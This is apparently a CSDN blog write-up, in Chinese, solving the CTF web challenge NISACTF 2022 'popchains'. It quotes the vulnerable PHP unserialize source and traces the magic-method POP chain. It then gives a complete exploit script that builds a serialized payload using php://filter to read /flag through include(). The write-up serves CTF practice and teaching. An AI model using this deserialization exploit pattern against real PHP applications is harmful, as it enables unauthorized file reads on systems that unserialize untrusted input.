NSS [NISACTF 2022]popchains

最新推荐文章于 2024-06-16 18:29:03 发布

Jay 17

最新推荐文章于 2024-06-16 18:29:03 发布

阅读量237

点赞数

分类专栏： CTF-web（零散wp合集）文章标签： php web安全

本文链接：https://blog.csdn.net/Jayjay___/article/details/130102659

版权

CTF-web（零散wp合集）专栏收录该内容

103 篇文章 3 订阅

订阅专栏

NSS [NISACTF 2022]popchains

先看看题目，源码如下。

<?php
echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);        //@为了不报错
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}

服务器反序列化Road_is_Long—>Road_is_Long::wakeup()—>Road_is_Long::toString()–>Make_a_Change::get()—>Try_Work_Hard::invoke()—>Try_Work_Hard::append()

exp:
<?php
class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var="php://filter/read=convert.base64-encode/resource=/flag";  //protected不能从外面赋值
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}



$road1 = new Road_is_Long();   
$road2 = new Road_is_Long();   
$try = new Try_Work_Hard();
$make = new Make_a_Change();
 
$road1->page = $road2;
$road2->string=$make;
$make->effort=$try;


$jay17 = serialize($road1);
echo urlencode($jay17);